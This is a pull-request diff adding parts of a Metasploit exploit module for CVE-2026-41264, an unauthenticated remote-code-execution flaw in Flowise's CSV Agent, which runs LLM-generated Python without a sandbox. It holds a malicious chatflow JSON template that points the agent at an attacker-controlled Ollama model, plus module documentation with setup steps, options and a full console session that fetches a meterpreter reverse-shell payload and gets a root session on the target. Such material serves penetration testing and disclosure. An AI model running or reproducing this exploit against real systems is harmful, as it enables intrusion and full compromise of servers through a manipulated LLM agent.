Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 7 additions & 0 deletions data/exploits/CVE-2026-41264/cve_2026_41264.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
{
"name": "__NAME__",
"flowData": "{\"nodes\":[{\"id\":\"csvAgent_0\",\"position\":{\"x\":795,\"y\":248},\"type\":\"customNode\",\"data\":{\"id\":\"csvAgent_0\",\"label\":\"CSV Agent\",\"version\":3,\"name\":\"csvAgent\",\"type\":\"AgentExecutor\",\"baseClasses\":[\"AgentExecutor\",\"BaseChain\",\"Runnable\"],\"category\":\"Agents\",\"description\":\"Agent used to answer queries on CSV data\",\"inputParams\":[{\"label\":\"Csv File\",\"name\":\"csvFile\",\"type\":\"file\",\"fileType\":\".csv\",\"id\":\"csvAgent_0-input-csvFile-file\",\"display\":true},{\"label\":\"System Message\",\"name\":\"systemMessagePrompt\",\"type\":\"string\",\"rows\":4,\"additionalParams\":true,\"optional\":true,\"placeholder\":\"I want you to act as a document that I am having a conversation with. Your name is \\\"AI Assistant\\\". You will provide me with answers from the given info. If the answer is not included, say exactly \\\"Hmm, I am not sure.\\\" and stop after that. Refuse to answer any question not about the info. Never break character.\",\"id\":\"csvAgent_0-input-systemMessagePrompt-string\",\"display\":true},{\"label\":\"Custom Pandas Read_CSV Code\",\"description\":\"Custom Pandas <a target=\\\"_blank\\\" href=\\\"https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\\\">read_csv</a> function. Takes in an input: \\\"csv_data\\\"\",\"name\":\"customReadCSV\",\"default\":\"read_csv(csv_data)\",\"type\":\"code\",\"optional\":true,\"additionalParams\":true,\"id\":\"csvAgent_0-input-customReadCSV-code\",\"display\":true}],\"inputAnchors\":[{\"label\":\"Language Model\",\"name\":\"model\",\"type\":\"BaseLanguageModel\",\"id\":\"csvAgent_0-input-model-BaseLanguageModel\",\"display\":true},{\"label\":\"Input Moderation\",\"description\":\"Detect text that could generate harmful output and prevent it from being sent to the language model\",\"name\":\"inputModeration\",\"type\":\"Moderation\",\"optional\":true,\"list\":true,\"id\":\"csvAgent_0-input-inputModeration-Moderation\",\"display\":true}],\"inputs\":{\"model\":\"{{ollama_0.data.instance}}\",\"systemMessagePrompt\":\"\",\"inputModeration\":\"\",\"customReadCSV\":\"read_csv(csv_data)\",\"csvFile\":\"data:text/csv;base64,__PAYLOAD__,filename:__FILENAME__\"},\"outputAnchors\":[{\"id\":\"csvAgent_0-output-csvAgent-AgentExecutor|BaseChain|Runnable\",\"name\":\"csvAgent\",\"label\":\"AgentExecutor\",\"description\":\"Agent used to answer queries on CSV data\",\"type\":\"AgentExecutor | BaseChain | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":470,\"selected\":true,\"dragging\":false,\"positionAbsolute\":{\"x\":795,\"y\":248}},{\"id\":\"ollama_0\",\"position\":{\"x\":352.1404559232181,\"y\":217.87567356209098},\"type\":\"customNode\",\"data\":{\"id\":\"ollama_0\",\"label\":\"Ollama\",\"version\":2,\"name\":\"ollama\",\"type\":\"Ollama\",\"baseClasses\":[\"Ollama\",\"LLM\",\"BaseLLM\",\"BaseLanguageModel\",\"Runnable\"],\"category\":\"LLMs\",\"description\":\"Wrapper around open source large language models on Ollama\",\"inputParams\":[{\"label\":\"Base URL\",\"name\":\"baseUrl\",\"type\":\"string\",\"default\":\"__OLLAMAAPIURI__\",\"id\":\"ollama_0-input-baseUrl-string\",\"display\":true},{\"label\":\"Model Name\",\"name\":\"modelName\",\"type\":\"string\",\"placeholder\":\"llama2\",\"id\":\"ollama_0-input-modelName-string\",\"display\":true},{\"label\":\"Temperature\",\"name\":\"temperature\",\"type\":\"number\",\"description\":\"The temperature of the model. Increasing the temperature will make the model answer more creatively. (Default: 0.8). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"default\":0.9,\"optional\":true,\"id\":\"ollama_0-input-temperature-number\",\"display\":true},{\"label\":\"Top P\",\"name\":\"topP\",\"type\":\"number\",\"description\":\"Works together with top-k. A higher value (e.g., 0.95) will lead to more diverse text, while a lower value (e.g., 0.5) will generate more focused and conservative text. (Default: 0.9). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-topP-number\",\"display\":true},{\"label\":\"Top K\",\"name\":\"topK\",\"type\":\"number\",\"description\":\"Reduces the probability of generating nonsense. A higher value (e.g. 100) will give more diverse answers, while a lower value (e.g. 10) will be more conservative. (Default: 40). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-topK-number\",\"display\":true},{\"label\":\"Mirostat\",\"name\":\"mirostat\",\"type\":\"number\",\"description\":\"Enable Mirostat sampling for controlling perplexity. (default: 0, 0 = disabled, 1 = Mirostat, 2 = Mirostat 2.0). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostat-number\",\"display\":true},{\"label\":\"Mirostat ETA\",\"name\":\"mirostatEta\",\"type\":\"number\",\"description\":\"Influences how quickly the algorithm responds to feedback from the generated text. A lower learning rate will result in slower adjustments, while a higher learning rate will make the algorithm more responsive. (Default: 0.1) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostatEta-number\",\"display\":true},{\"label\":\"Mirostat TAU\",\"name\":\"mirostatTau\",\"type\":\"number\",\"description\":\"Controls the balance between coherence and diversity of the output. A lower value will result in more focused and coherent text. (Default: 5.0) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-mirostatTau-number\",\"display\":true},{\"label\":\"Context Window Size\",\"name\":\"numCtx\",\"type\":\"number\",\"description\":\"Sets the size of the context window used to generate the next token. (Default: 2048) Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numCtx-number\",\"display\":true},{\"label\":\"Number of GQA groups\",\"name\":\"numGqa\",\"type\":\"number\",\"description\":\"The number of GQA groups in the transformer layer. Required for some models, for example it is 8 for llama2:70b. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numGqa-number\",\"display\":true},{\"label\":\"Number of GPU\",\"name\":\"numGpu\",\"type\":\"number\",\"description\":\"The number of layers to send to the GPU(s). On macOS it defaults to 1 to enable metal support, 0 to disable. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numGpu-number\",\"display\":true},{\"label\":\"Number of Thread\",\"name\":\"numThread\",\"type\":\"number\",\"description\":\"Sets the number of threads to use during computation. By default, Ollama will detect this for optimal performance. It is recommended to set this value to the number of physical CPU cores your system has (as opposed to the logical number of cores). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-numThread-number\",\"display\":true},{\"label\":\"Repeat Last N\",\"name\":\"repeatLastN\",\"type\":\"number\",\"description\":\"Sets how far back for the model to look back to prevent repetition. (Default: 64, 0 = disabled, -1 = num_ctx). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-repeatLastN-number\",\"display\":true},{\"label\":\"Repeat Penalty\",\"name\":\"repeatPenalty\",\"type\":\"number\",\"description\":\"Sets how strongly to penalize repetitions. A higher value (e.g., 1.5) will penalize repetitions more strongly, while a lower value (e.g., 0.9) will be more lenient. (Default: 1.1). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-repeatPenalty-number\",\"display\":true},{\"label\":\"Stop Sequence\",\"name\":\"stop\",\"type\":\"string\",\"rows\":4,\"placeholder\":\"AI assistant:\",\"description\":\"Sets the stop sequences to use. Use comma to seperate different sequences. Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-stop-string\",\"display\":true},{\"label\":\"Tail Free Sampling\",\"name\":\"tfsZ\",\"type\":\"number\",\"description\":\"Tail free sampling is used to reduce the impact of less probable tokens from the output. A higher value (e.g., 2.0) will reduce the impact more, while a value of 1.0 disables this setting. (Default: 1). Refer to <a target=\\\"_blank\\\" href=\\\"https://github.com/jmorganca/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values\\\">docs</a> for more details\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"ollama_0-input-tfsZ-number\",\"display\":true}],\"inputAnchors\":[{\"label\":\"Cache\",\"name\":\"cache\",\"type\":\"BaseCache\",\"optional\":true,\"id\":\"ollama_0-input-cache-BaseCache\",\"display\":true}],\"inputs\":{\"cache\":\"\",\"baseUrl\":\"__OLLAMAAPIURI__\",\"modelName\":\"__MODELNAME__\",\"temperature\":0.9,\"topP\":\"\",\"topK\":\"\",\"mirostat\":\"\",\"mirostatEta\":\"\",\"mirostatTau\":\"\",\"numCtx\":\"\",\"numGqa\":\"\",\"numGpu\":\"\",\"numThread\":\"\",\"repeatLastN\":\"\",\"repeatPenalty\":\"\",\"stop\":\"\",\"tfsZ\":\"\"},\"outputAnchors\":[{\"id\":\"ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable\",\"name\":\"ollama\",\"label\":\"Ollama\",\"description\":\"Wrapper around open source large language models on Ollama\",\"type\":\"Ollama | LLM | BaseLLM | BaseLanguageModel | Runnable\"}],\"outputs\":{},\"selected\":false},\"width\":300,\"height\":586,\"selected\":false,\"positionAbsolute\":{\"x\":352.1404559232181,\"y\":217.87567356209098},\"dragging\":false}],\"edges\":[{\"source\":\"ollama_0\",\"sourceHandle\":\"ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable\",\"target\":\"csvAgent_0\",\"targetHandle\":\"csvAgent_0-input-model-BaseLanguageModel\",\"type\":\"buttonedge\",\"id\":\"ollama_0-ollama_0-output-ollama-Ollama|LLM|BaseLLM|BaseLanguageModel|Runnable-csvAgent_0-csvAgent_0-input-model-BaseLanguageModel\"}],\"viewport\":{\"x\":384.43132370461996,\"y\":-150.62729892561072,\"zoom\":0.794291033198883}}",
"deployed": false,
"isPublic": false,
"type": "CHATFLOW"
}
Original file line number Diff line number Diff line change
@@ -0,0 +1,131 @@
## Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM generated python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

* flowise <= 3.0.13
* flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker


### Installation
1. `docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13`

2. `On an attacker machine`
```
curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
```


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb`
4. Do: `run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>`
5. You should get a meterpreter


## Options

### APIKEY (required)

Flowise API key to interact with Flowise.

### OLLAMAAPIURI (required)

Endpoint of the OLLAMA API controlled by an attacker.

### MODEL (required)

Valid ollama model name.


## Scenarios

### cmd/linux/http/x64/meterpreter_reverse_tcp
```
msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > options

Module options (exploit/multi/http/flowise_auth_rce_cve_2026_41264):

Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes Flowise API Key
MODEL yes Valid ollama model name
OLLAMAAPIURI yes Endpoint of the OLLAMA API controlled by an attacker
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, socks5, socks5h, sapni, socks4
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 3000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
cepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


When FETCH_COMMAND is one of CURL,GET,WGET:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.


When FETCH_FILELESS is none:

Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME rEMNcqUnjzT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces


Exploit target:

Id Name
-- ----
0 Linux Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:45382) at 2026-05-05 13:45:41 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : acc229b14e46
OS : (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
Loading
Loading